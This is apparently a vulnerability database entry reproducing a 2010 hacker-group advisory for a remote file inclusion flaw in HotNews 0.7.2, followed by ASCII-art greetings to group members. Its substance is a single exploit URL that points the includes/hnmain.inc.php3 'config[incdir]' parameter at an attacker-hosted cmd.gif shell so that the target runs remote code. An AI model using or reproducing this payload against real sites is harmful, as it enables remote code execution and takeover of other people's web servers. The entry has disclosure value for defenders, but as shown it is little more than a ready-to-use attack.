HotNews 0.7.2 Remote File Inclusion Vulnerability

2010-04-12T00:00:00
ID SSV:19443
Type seebug
Reporter Root
Modified 2010-04-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[                                                                                          [[
[[ HotNews 0.7.2 Remote File Inclusion Vulnerability                                            [[
[[                                                          [[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |                     [[
[[                                                          [[
[[                                                          [[
[[ ##   Exploit:                                                            [[
[[                                                          [[
[[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif???                            [[
[[                                                          [[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
         |||                    |||
         |||                    |||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~                                    ~~~~
~~~~    MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~
~~~~    thanks for : cr4wl3r [ http://shell4u.tk/ ]             ~~~~
~~~~                                    ~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~